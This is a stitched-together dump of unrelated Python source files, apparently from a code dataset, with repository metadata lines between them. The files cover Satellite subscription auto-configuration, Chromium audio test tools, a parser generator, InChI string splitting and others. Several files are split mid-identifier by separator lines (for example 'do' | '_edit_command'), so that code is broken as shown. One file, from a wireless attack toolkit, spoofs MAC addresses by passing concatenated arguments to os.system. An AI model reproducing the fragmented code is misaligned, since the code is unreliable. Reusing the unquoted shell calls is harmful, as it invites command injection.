proxy = proxy + rhsm_proxy_hostname + ':' + rhsm_proxy_port
logger.debug("RHSM Proxy: %s", proxy)
logger.debug("Found Satellite Server Host: %s, Port: %s",
rhsm_hostname, rhsm_hostport)
rhsm_ca = rhsm_config.get('rhsm', 'repo_ca_cert')
logger.debug("Found CA: %s", rhsm_ca)
logger.debug("Setting authmethod to CERT")
config['authmethod'] = 'CERT'
# Directly connected to Red Hat, use cert auth directly with the api
if (rhsm_hostname == 'subscription.rhn.redhat.com' or
rhsm_hostname == 'subscription.rhsm.redhat.com'):
logger.debug("Connected to Red Hat Directly, using cert-api")
rhsm_hostname = 'cert-api.access.redhat.com'
rhsm_ca = None
else:
# Set the host path
# 'rhsm_hostname' should really be named ~ 'rhsm_host_base_url'
rhsm_hostname = rhsm_hostname + ':' + rhsm_hostport + '/redhat_access'
logger.debug("Trying to set auto_configuration")
set_auto_configuration(rhsm_hostname, rhsm_ca, proxy)
return True
except Exception as e:
logger.debug(e)
logger.debug('System is NOT subscription-manager registered')
return False
def _read_systemid_file(path):
with open(path, "r") as systemid:
data = systemid.read().replace('\n', '')
return data
def _try_satellite5_configuration():
"""
Attempt to determine Satellite 5 Configuration
"""
logger.debug("Trying Satellite 5 auto_config")
rhn_config = '/etc/sysconfig/rhn/up2date'
systemid = '/etc/sysconfig/rhn/systemid'
if os.path.isfile(rhn_config):
if os.path.isfile(systemid):
config['systemid'] = _read_systemid_file(systemid)
else:
logger.debug("Could not find Satellite 5 systemid file.")
return False
logger.debug("Found Satellite 5 Config")
rhn_conf_file = file(rhn_config, 'r')
hostname = None
for line in rhn_conf_file:
if line.startswith('serverURL='):
url = urlparse(line.split('=')[1])
hostname = url.netloc + '/redhat_access'
logger.debug("Found hostname %s", hostname)
if line.startswith('sslCACert='):
rhn_ca = line.strip().split('=')[1]
# Auto discover proxy stuff
if line.startswith('enableProxy='):
proxy_enabled = line.strip().split('=')[1]
if line.startswith('httpProxy='):
proxy_host_port = line.strip().split('=')[1]
if line.startswith('proxyUser='):
proxy_user = line.strip().split('=')[1]
if line.startswith('proxyPassword='):
proxy_password = line.strip().split('=')[1]
if hostname:
proxy = None
if proxy_enabled == "1":
proxy = "http://"
if proxy_user != "" and proxy_password != "":
logger.debug("Found user and password for rhn_proxy")
proxy = proxy + proxy_user + ':' + proxy_password
proxy = proxy + "@" + proxy_host_port
else:
proxy = proxy + proxy_host_port
logger.debug("RHN Proxy: %s", proxy)
set_auto_configuration(hostname, rhn_ca, proxy)
else:
logger.debug("Could not find hostname")
return False
return True
else:
logger.debug("Could not find rhn config")
return False
def try_auto_configuration():
"""
Try to auto-configure if we are attached to a sat5/6
"""
if config['auto_config'] and not config['offline']:
if not _try_satellite6_configuration():
_try_satellite5_configuration()
|
operatorequals/gatheros
|
gatheros/editor/cmd_interface.py
|
Python
|
bsd-3-clause
| 3,370
| 0.07092
|
import cmd
import json
import termcolor
from struct_manager import createEmptyCommandGroup, createEmptyStruct, createEmptyCommand
from populator import populateDict
class EditorShell ( cmd.Cmd ) :
def __init__ ( self, file ) :
cmd.Cmd.__init__(self)
self.file = file
# self.struct = json.load ( self.file )
try :
self.struct = json.load ( self.file )
except :
print "[!] Can't open the JSON file, creating a new struct"
self.struct = createEmptyStruct()
self.cur_node = self.struct
def do_add( self, line ) :
if not line :
return
line = line.strip()
toks = line.split()
ident = toks[0].lower()
if 'command' == ident :
self.do_add_command( ' '.join( toks [1:] ) )
pass # add command
elif 'group' == ident :
self.do_add_group( ' '.join( toks [1:] ) )
pass # add command
elif 'dependency' == ident :
pass # add command
else :
print " '%s' not available subcommand!" % ident
def do_add_group( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
codename, group = createEmptyCommandGroup( toks[0] )
populateDict(group)
print group
self.struct['CommandGroups'][ codename ] = group
def do_add_command( self, line ) :
if not line :
print "Need a 'group code name' "
return
line = line.strip()
toks = line.split()
codename = toks[0]
unique, command = createEmptyCommand( )
populateDict( command )
self.struct['CommandGroups'][ codename ]['Commands'][ unique ] = command
print "Command '%s' created!" % unique
def do_add_dependency( self, line ) :
pass
def do_show_command( self, line ) :
pass
def do
|
_edit_command( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
ident = toks[0]
for gname, group in self.st
|
ruct['CommandGroups'].iteritems() :
try :
comm = group['Commands'][ident]
break
except :
pass
if not comm :
print "Identifier '%s' doesn't exist" % comm
return
populateDict( comm, False )
def do_edit_group( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
gname = toks[0]
group = self.struct['CommandGroups'][gname]
populateDict( group )
if not comm :
print "Identifier '%s' doesn't exist" % comm
return
def do_list( self, line ) :
for group in self.struct['CommandGroups'].keys() :
print group
def do_list_commands( self, line ) :
for gname, group in self.struct['CommandGroups'].iteritems() :
print "=========== %s ===========" % group['name']
for k, v in group['Commands'].iteritems() :
print '''{0:24} -| {1:<64}\n-> {2:<64}
'''.format( k, v['command'].encode('utf8'), v['description'].encode('utf8') )
print "=========== --- ==========="
print
def do_save( self, line ) :
self.file.seek(0)
self.file.write( json.dumps( self.struct, indent = 1 ) + '\n' )
self.file.truncate()
def do_create_dependency( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
dep = toks[0]
self.struct['DependencyTokens'].append( dep )
def do_d_list( self, line ) :
for group in self.struct.keys() :
print group
def do_d_show( self, line ) :
print json.dumps( self.struct, indent = 1 )
|
wallarelvo/racer
|
racer/roadmap.py
|
Python
|
apache-2.0
| 539
| 0
|
import networkx as nx
class Roadmap(nx.Graph):
def __init__(self, gd, max_dist, *args, **kwarg
|
s):
self.gd = gd
self.max_dist = max_dist
nx.Graph.__init__(self, *args, **kwargs)
def insert(self, sample):
self.gd.insert(sample)
for smpl in self.gd.get_nearest(sample):
if smpl == sample:
continue
if smpl.dist_to(sample) <= self.max_dist:
self.add_edge(smpl, sample
|
)
def make(*args, **kwargs):
return Roadmap(*args, **kwargs)
|
loopCM/chromium
|
chrome/test/functional/media/audio_tools.py
|
Python
|
bsd-3-clause
| 6,222
| 0.010125
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Audio tools for recording and analyzing audio.
The audio tools provided here are mainly to:
- record playing audio.
- remove silence from beginning and end of audio file.
- compare audio files using PESQ tool.
The tools are supported on Windows and Linux.
"""
import commands
import ctypes
import logging
import os
import re
import subprocess
import sys
import threading
import time
import pyauto_media
import pyauto
_TOOLS_PATH = os.path.abspath(os.path.join(pyauto.PyUITest.DataDir(),
'pyauto_private', 'media', 'tools'))
WINDOWS = 'win32' in sys.platform
if WINDOWS:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq.exe')
_SOX_PATH = os.path.join(_TOOLS_PATH, 'sox.exe')
_AUDIO_RECORDER = r'SoundRecorder.exe'
else:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq')
_SOX_PATH = commands.getoutput('which sox')
_AUDIO_RECORDER = commands.getoutput('which arecord')
_PACMD_PATH = commands.getoutput('which pacmd')
class AudioRecorderThread(threading.Thread):
"""A thread that records audio out of the default audio output."""
def __init__(self, duration, output_file, record_mono=False):
threading.Thread.__init__(self)
self.error = ''
self._duration = duration
self._output_file = output_file
self._record_mono = record_mono
def run(self):
"""Starts audio recording."""
if WINDOWS:
if self._record_mono:
raise
|
Exception("Mono recording not supported on Windows yet!")
duration = time.strftime('%H:%M:%S', time.gmtime(self._duration))
cmd = [_AUDIO_RECORDER, '/FILE', self._output_file, '/DURATION',
duration]
# This is needed to run SoundR
|
ecorder.exe on Win-64 using Python-32 bit.
ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(
ctypes.byref(ctypes.c_long()))
else:
num_channels = 1 if self._record_mono else 2
cmd = [_AUDIO_RECORDER, '-d', self._duration, '-f', 'dat', '-c',
str(num_channels), self._output_file]
cmd = [str(s) for s in cmd]
logging.debug('Running command: %s', ' '.join(cmd))
returncode = subprocess.call(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if returncode != 0:
self.error = 'Failed to record audio.'
else:
logging.debug('Finished recording audio into %s.', self._output_file)
def RunPESQ(audio_file_ref, audio_file_test, sample_rate=16000):
"""Runs PESQ to compare audio test file to a reference audio file.
Args:
audio_file_ref: The reference audio file used by PESQ.
audio_file_test: The audio test file to compare.
sample_rate: Sample rate used by PESQ algorithm, possible values are only
8000 or 16000.
Returns:
A tuple of float values representing PESQ scores of the audio_file_ref and
audio_file_test consecutively.
"""
# Work around a bug in PESQ when the ref file path is > 128 chars. PESQ will
# compute an incorrect score then (!), and the relative path to the ref file
# should be a lot shorter than the absolute one.
audio_file_ref = os.path.relpath(audio_file_ref)
cmd = [_PESQ_PATH, '+%d' % sample_rate, audio_file_ref, audio_file_test]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error running pesq: %s\n%s', output, error)
# Last line of PESQ output shows the results. Example:
# P.862 Prediction (Raw MOS, MOS-LQO): = 4.180 4.319
result = re.search('Prediction.*= (\d{1}\.\d{3})\t(\d{1}\.\d{3})',
output)
if not result or len(result.groups()) != 2:
return None
return (float(result.group(1)), float(result.group(2)))
def RemoveSilence(input_audio_file, output_audio_file):
"""Removes silence from beginning and end of the input_audio_file.
Args:
input_audio_file: The audio file to remove silence from.
output_audio_file: The audio file to save the output audio.
"""
# SOX documentation for silence command: http://sox.sourceforge.net/sox.html
# To remove the silence from both beginning and end of the audio file, we call
# sox silence command twice: once on normal file and again on its reverse,
# then we reverse the final output.
# Silence parameters are (in sequence):
# ABOVE_PERIODS: The period for which silence occurs. Value 1 is used for
# silence at beginning of audio.
# DURATION: the amount of time in seconds that non-silence must be detected
# before sox stops trimming audio.
# THRESHOLD: value used to indicate what sample value is treates as silence.
ABOVE_PERIODS = '1'
DURATION = '2'
THRESHOLD = '5%'
cmd = [_SOX_PATH, input_audio_file, output_audio_file, 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse', 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse']
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error removing silence from audio: %s\n%s', output, error)
def ForceMicrophoneVolumeTo100Percent():
if WINDOWS:
logging.error('Volume forcing not implemented on Windows yet.')
else:
# The recording device id is machine-specific. We assume here it is called
# Monitor of render (which corresponds to the id render.monitor). You can
# list the available recording devices with pacmd list-sources.
RECORDING_DEVICE_ID = 'render.monitor'
HUNDRED_PERCENT_VOLUME = '65536'
cmd = [_PACMD_PATH, 'set-source-volume', RECORDING_DEVICE_ID,
HUNDRED_PERCENT_VOLUME]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error forcing mic volume to 100%%: %s\n%s', output, error)
|
thinkasoft/ProyectoRD-dev
|
l10n_ve_withholding_islr/__init__.py
|
Python
|
agpl-3.0
| 1,587
| 0.002522
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
###########################################################################
# Module Written to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.c
|
om.ve>).
# All Rights Reserved
###############Credits######################################################
# Coded by: Humberto Arocha <hbto@vauxoo.com>
# María Gabriela Quilarque <gabriela@vauxoo.com>
# Javier Duran <javier@vauxoo.com>
# Planified by: Nhomar Hernandez
# Finance by: Helados Gil
|
da, C.A. http://heladosgilda.com.ve
# Audited by: Humberto Arocha humberto@openerp.com.ve
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import model
import report
import wizard
#import edi
|
sahat/bokeh
|
examples/plotting/cloud/candlestick.py
|
Python
|
bsd-3-clause
| 853
| 0.009379
|
from math import pi
import pandas as pd
from bokeh.sampledata.stocks import MSFT
from bokeh.plotting import *
df = pd.DataFrame(MSFT)[:50]
df['date'] = pd.to_datetime(df['date'])
mids = (df.open + df.close)/2
spans = abs(df.close-df.open)
inc = df.close > df.open
dec = df.open > df.close
w = 12*60*60*1000 # half day in ms
output_cloud("candlestick")
figure(x_axis_type = "datetime", tools="pan,wheel_zoom,box_zoom,reset,previewsave",
width=1000, name="candlestick")
hold()
segment(df.date, df.high, df.date, df.low, color='black')
rect(df.date[inc], mids[inc], w, spans[inc], fill_color="#D5E1DD", line_color="black")
rect(df.
|
date[dec], mids[dec], w, spans[dec], fill_color="#F2583E", line_co
|
lor="black")
curplot().title = "MSFT Candlestick"
xaxis().major_label_orientation = pi/4
grid().grid_line_alpha=0.3
# open a browser
show()
|
cn-app-registry/cnr-server
|
appr/api/config.py
|
Python
|
apache-2.0
| 545
| 0
|
from __future__ import absolute_import, division, print_function
import os
class Config(object):
""" Default configuration """
DEBUG = False
APPR_URI = os.getenv('APPR_URI', "http://localhost:5000")
class ProductionConfig(Config):
""" Production configuration """
APPR_URI = "ht
|
tp://localhost:5000"
APPR_BACKEND = 'false'
class DevelopmentConfig(Config):
""" Development configuration """
DEBUG = True
# APPR_URI = 'https://api.appr.sh'
APPR_URI = os.getenv('APPR_URI', "http://loc
|
alhost:5000")
|
NickSanzotta/WiFiSuite
|
wifisuite/helpers/macchange.py
|
Python
|
mit
| 1,617
| 0.019171
|
# Module: macchanger.py
# Description: Wrapper for built-in linux tool macchanger.
# Author: Nick Sanzotta/@Beamr
# Version: v 1.09252017
try:
import os, sys, time
from subprocess import Popen, PIPE
from theme import *
except Exception as e:
print('\n [!] MACCHANGE - Error: ' % (e))
sys.exit(1)
def macRandom(interface):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchanger -r ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(bl
|
ue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
def macManual(interface, macaddress):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchange
|
r -m ' + macaddress + ' ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(blue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
|
swesterfeld/beast
|
yapps2_deb/yapps2.py
|
Python
|
lgpl-2.1
| 4,135
| 0.006288
|
#!/usr/bin/env python2
#
# Yapps 2 - yet another python parser system
# Copyright 1999-2003 by Amit J. Patel <amitp@cs.stanford.edu>
#
# This version of Yapps 2 can be distributed under the
# terms of the MIT open source license, either found in the LICENSE file
# included with the Yapps distribution
# <http://theory.stanford.edu/~amitp/yapps/> or at
# <http://www.opensource.org/licenses/mit-license.php>
#
import sys, re
from yapps import runtime, parsetree
def generate(inputfilename, outputfilename='', dump=0, **flags):
"""Generate a grammar, given an input filename (X.g)
and an output filename (defaulting to X.py)."""
if not outputfilename:
if inputfilename.endswith('.g'):
outputfilename = inputfilename[:-2] + '.py'
else:
raise Exception('Must specify output filename if input filename is not *.g')
DIVIDER = '\n%%\n' # This pattern separates the pre/post parsers
preparser, postparser = None, None # Code before and after the parser desc
# Read the entire file
s = open(inputfilename,'r').read()
# See if there's a separation between the pre-parser and parser
f = s.find(DIVIDER)
if f >= 0: preparser, s = s[:f]+'\n\n', s[f+len(DIVIDER):]
# See if there's a separation between the parser and post-
|
parser
f = s.find(DIVIDER)
if f >= 0: s, postparser = s[:f], '\n\n'+s[f+len(DIVIDER):]
# Create the parser and scanner and parse the text
scanner = grammar.ParserDescriptionScanner(s, filename=inputfilena
|
me)
if preparser: scanner.del_line += preparser.count('\n')
parser = grammar.ParserDescription(scanner)
t = runtime.wrap_error_reporter(parser, 'Parser')
if t is None: return 1 # Failure
if preparser is not None: t.preparser = preparser
if postparser is not None: t.postparser = postparser
# Check the options
for f in t.options.keys():
for opt,_,_ in yapps_options:
if f == opt: break
else:
print >>sys.stderr, 'Warning: unrecognized option', f
# Add command line options to the set
for f in flags.keys(): t.options[f] = flags[f]
# Generate the output
if dump:
t.dump_information()
else:
t.output = open(outputfilename, 'w')
t.generate_output()
return 0
if __name__ == '__main__':
import doctest
doctest.testmod(sys.modules['__main__'])
doctest.testmod(parsetree)
# Someday I will use optparse, but Python 2.3 is too new at the moment.
yapps_options = [
('context-insensitive-scanner',
'context-insensitive-scanner',
'Scan all tokens (see docs)'),
]
import getopt
optlist, args = getopt.getopt(sys.argv[1:], 'f:', ['help', 'dump', 'use-devel-grammar'])
if not args or len(args) > 2:
print >>sys.stderr, 'Usage:'
print >>sys.stderr, ' python', sys.argv[0], '[flags] input.g [output.py]'
print >>sys.stderr, 'Flags:'
print >>sys.stderr, (' --dump' + ' '*40)[:35] + 'Dump out grammar information'
print >>sys.stderr, (' --use-devel-grammar' + ' '*40)[:35] + 'Use the devel grammar parser from yapps_grammar.py instead of the stable grammar from grammar.py'
for flag, _, doc in yapps_options:
print >>sys.stderr, (' -f' + flag + ' '*40)[:35] + doc
else:
# Read in the options and create a list of flags
flags = {}
use_devel_grammar = 0
for opt in optlist:
for flag, name, _ in yapps_options:
if opt == ('-f', flag):
flags[name] = 1
break
else:
if opt == ('--dump', ''):
flags['dump'] = 1
elif opt == ('--use-devel-grammar', ''):
use_devel_grammar = 1
else:
print >>sys.stderr, 'Warning: unrecognized option', opt[0], opt[1]
if use_devel_grammar:
import yapps_grammar as grammar
else:
from yapps import grammar
sys.exit(generate(*tuple(args), **flags))
|
nbateshaus/chem-search
|
inchi-split/splitter.py
|
Python
|
bsd-3-clause
| 9,306
| 0.016548
|
import re
from collections import namedtuple
# this is almost a validating expression, it could certainly be simpler by just using [^/]* inside the groups
chargeDef = r"(/q[\-\+0-9;\*mMnNi]*)?"
protonationDef = r"(/p[\-\+0-9,;]*)?"
isotopeDef = r"(/i[\-\+0-9,;HDT]*(?:/h[0-9HDT]+)*)?"
stereoBondDef=r"(/b[\-\+0-9,\?\*;mNnNi]*)?"
stereoTetDef=r"(/t[\-\+0-9,\?;\*mMnNi]*)?"
stereoMDef=r"(/m[\-\+0-9,;\.]*)?"
stereoSDef=r"(/s[\-\+0-9,;]*)?"
inchiLayers=(
r"(InChI=1S?)",
r"(/[a-zA-Z0-9\.]*)", # formula
r"(/c[0-9\(\)\-\,\*;]*)?", # skeleton
r"(/h[0-9,\-\Hh\*\(\);]*)?", # hydrogens
chargeDef, # charge
protonationDef, # protonation
stereoBondDef, # stereo_bond
stereoTetDef, #stereo_tet
stereoMDef, #stereo_m
stereoSDef, #stereo_s
isotopeDef, #isotope
stereoBondDef, #isotope_stereo_bond
stereoTetDef, #isotope_stereo_tet
stereoMDef, #isotope_stereo_m
stereoSDef, #isotope_stereo_s
r"(/f[a-zA-Z0-9\.]*(?:/h[0-9,\-\Hh\*\(\);]*)?)?", # fixed_h
chargeDef, # fixedh_charge
protonationDef, # fixedh_protonation
stereoBondDef, #fixedh_stereo_bond
stereoTetDef, #fixedh_stereo_tet
stereoMDef, #fixedh_stereo_m
stereoSDef, #fixedh_stereo_s
isotopeDef, #fixedh_isotope
stereoBondDef, #fixedh_isotope_stereo_bond
stereoTetDef, #fixedh_isotope_stereo_tet
stereoMDef, #fixedh_isotope_stereo_m
stereoSDef, #fixedh_isotope_stereo_s
r"(/o[\(\)0-9,]*)?", # transposition
r"(/r.*)?", # reconnected_main # <- FIX: we punt on this
)
coreExpr=re.compile(''.join(inchiLayers))
Layers=namedtuple("Layers",['start','formula','skeleton','hydrogens',
# pos 4
'charge','protonation',
# pos 6
'stereo_bond','stereo_tet','stereo_m','stereo_s',
# pos 10
'isotope','isotope_stereo_bond','isotope_stereo_tet','isotope_stereo_m','isotope_stereo_s',
# pos 15
'fixedh','fixedh_charge','fixedh_protonation',
# pos 18
'fixedh_stereo_bond','fixedh_stereo_tet','fixedh_stereo_m','fixedh_stereo_s',
# pos 22
'fixedh_isotope','fixedh_isotope_stereo_bond','fixedh_isotope_stereo_tet','fixedh_isotope_stereo_m','fixedh_isotope_stereo_s',
# pos 27
'transposition',
'reconnected_main'
])
layerGroups = {
'main':tuple(range(4)),
'charge':tuple(range(4,6)),
'stereo':tuple(range(6,10)),
'isotope':tuple(range(10,15)),
'fixedh':tuple(range(15,27)),
}
def formulaGrouping(tpl):
return (tpl[0],tpl[1],)
def mainGrouping(tpl):
return (tpl[x] for x in layerGroups['main'])
def chargeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge'])
def stereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo'])
def isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'][0:1])
def isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'])
def stereo_isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'][0:1])
def stereo_isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'])
def extractLayers(inchi):
"""
>>> tpl=extractLayers('InChI=1S/C16H20N4O3/c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22/h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)/t13?,14-/m0/s1')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'C16H20N4O3'
>>> tpl.skeleton
'c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22'
>>> tpl.hydrogens
'h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)'
>>> tpl.charge
''
>>> tpl.protonation
''
>>> tpl.stereo_bond
''
>>> tpl.stereo_tet
't13?,14-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
>>> tpl.isotope
''
>>> tpl.fixedh
''
Charge layers:
From [O-]CCCC[NH3+]
>>> tpl = extractLayers('InChI=1S/C4H10NO/c5-3-1-2-4-6/h1-5H2/q-1/p+1')
>>> tpl.charge
'q-1'
>>> tpl.protonation
'p+1'
Stereochemistry:
From [O-][C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1S/C9H12ClN2O3/c10-7(13)3-1-2-6(4-8(11)14)5-9(12)15/h1-3,7H,4-5H2,(H2,11,14)(H2,12,15)/q-1/b3-1+/t7-/m0/s1')
>>> tpl.stereo_bond
'b3-1+'
>>> tpl.stereo_tet
't7-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
Isotopes:
From: [13CH3]O
>>> tpl = extractLayers('InChI=1S/CH4O/c1-2/h2H,1H3/i1+1')
>>> tpl.isotope
'i1+1'
>>> tpl.isotope_stereo_tet
''
Isotope + stereo
From: [13CH3]O[C@H](C)O
>>> tpl = extractLayers('InChI=1S/C3H7ClO/c1-3(4)5-2/h3H,1-2H3/t3-/m1/s1/i2+1')
>>> tpl.isotope
'i2+1'
>>> tpl.stereo_tet
't3-'
>>> tpl.isotope_stereo_tet
''
Isotope causes stereo
From: [13CH3][C@H](C)O
>>> tpl = extractLayers('InChI=1S/C3H8O/c1-3(2)4/h3-4H,1-2H3/i1+1/t3-/m1/s1')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
''
>>> tpl.isotope_stereo_tet
't3-'
Isotope causes stereo + standard stereo
From: [13CH3][C@H](C)O[C@H](C)O
>>> tpl = extractLayers('InChI=1S/C5H12O2/c1-4(2)7-5(3)6/h4-6H,1-3H3/t5-/m1/s1/i1+1/t4-,5-')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
't5-'
>>> tpl.isotope_stereo_tet
't4-,5-'
Fixed Hs and Is
|
otopes
From: O=C([18O])/C=C/C(=[18O])O
>>> tpl = extractLayers('InChI=1/C4H3O4/c5-3(6)1-2-4(7)8/h1-2H,(H,5,6)/b2-1+/i5+2,7+2/f/h5H/i6+2,7+2')
>>> tpl.isotope
'i5+2,7+2'
>>> tpl.fixedh_isotope
'i6+2,7+2'
Fixed Hs causes stereo_bond
From: F[C@H](Cl
|
)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15)/b3-1+/t7-/m0/s1/f/h12,14H,13H2/b3-1+,6-2-,12-8?')
>>> tpl.fixedh
'f/h12,14H,13H2'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?'
Fixed Hs causes stereo
From: C[C@H](Cl)[C@H](/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C7H13ClN2O2/c1-4(8)5(2-6(9)11)3-7(10)12/h4-5H,2-3H2,1H3,(H2,9,11)(H2,10,12)/t4-/m0/s1/f/h9,11H,10H2/t4-,5+')
>>> tpl.fixedh
'f/h9,11H,10H2'
>>> tpl.fixedh_stereo_tet
't4-,5+'
Fixed Hs cause a new formula
From: C[C@H](CCC[C@@H](SCCC(C)(C)O)c1cccc(\C=C\c2ccc3ccc(Cl)cc3n2)c1)C(=O)[O-] # from ChEMBL
>>> tpl = extractLayers('InChI=1/C29H34ClNO3S/c1-20(28(32)33)6-4-9-27(35-17-16-29(2,3)34)23-8-5-7-21(18-23)10-14-25-15-12-22-11-13-24(30)19-26(22)31-25/h5,7-8,10-15,18-20,27,34H,4,6,9,16-17H2,1-3H3,(H,32,33)/p-1/b14-10+/t20-,27-/m1/s1/fC29H33ClNO3S/q-1')
>>> tpl.formula
'C29H34ClNO3S'
>>> tpl.fixedh
'fC29H33ClNO3S'
>>> tpl.fixedh_charge
'q-1'
Disconnected parts + Fixed Hs causes stereo_bond + isotopes cause stereo
From: [13CH3][C@H](C)O[C@H](C)O.F[C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2.C5H12O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15;1-4(2)7-5(3)6/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15);4-6H,1-3H3/b3-1+;/t7-;5-/m01/s1/i;1+1/t;4-,5-/f/h12,14H,13H2;/b3-1+,6-2-,12-8?;')
>>> tpl.stereo_bond
'b3-1+;'
>>> tpl.isotope
'i;1+1'
>>> tpl.isotope_stereo_tet
't;4-,5-'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?;'
Fixed Hs causes stereo + (FixedHs + isotopes) causes stereo (this is the most dependent example I can think of)
From: N=C(NC)C(/C(=NC)N)=C/CC/C=C(/C1=NC=C[15NH]1)C1NC=C[15N]=1
>>> tpl = extractLayers('InChI=1/C16H22N8/c1-19-13(17)11(14(18)20-2)5-3-4-6-12(15-21-7-8-22-15)16-23-9-10-24-16/h5-10H,3-4H2,1-2H3,(H2,17,19)(H2,18,20)(H,21,22)(H,23,24)/i21+1,23+1/f/h17,19,21,23H,18H2/b11-5-,17-13?,20-14?/i21+1,24+1/b11-5-,12-6-,17-13?,20-14?')
>>> tpl.isotope
'i21+1,23+1'
>>> tpl.isotope_ster
|
alimon/oeqa2
|
oeqa2/test/decorator/__init__.py
|
Python
|
mit
| 1,356
| 0.007375
|
# Copyright (C) 2016 Intel Corporation
# Released under the MIT license (see COPYING.MIT)
from functools import wraps
class OETestDecorator(object):
case = None # Reference of OETestCase decorated
attrs = None # Attributes to be loaded by decorator implementation
d
|
ef __init__(self, *args, **kwargs):
if not self.attrs:
return
for idx, attr in enumerate(self.attrs):
attr_type = self.attrs[attr]
if attr in kwargs:
value = kwargs[attr]
else:
value = args[idx]
value_type = type(value)
if not value_type == attr
|
_type:
class_name = self.__class__.__name__
raise TypeError("%s decorator attr %s expects argument %s"\
" received %s." % (class_name, attr, attr_type,
value_type))
setattr(self, attr, value)
def __call__(self, func):
@wraps(func)
def wrapped_f(*args, **kwargs):
self.attrs = self.attrs # XXX: Enables OETestLoader discover
return func(*args, **kwargs)
return wrapped_f
def bind(self, case):
self.case = case
self.case.decorators.append(self)
def setUp(self):
pass
from .depends import OETestDepends
from .oeid import OETestID
|
djrscally/eve-wspace
|
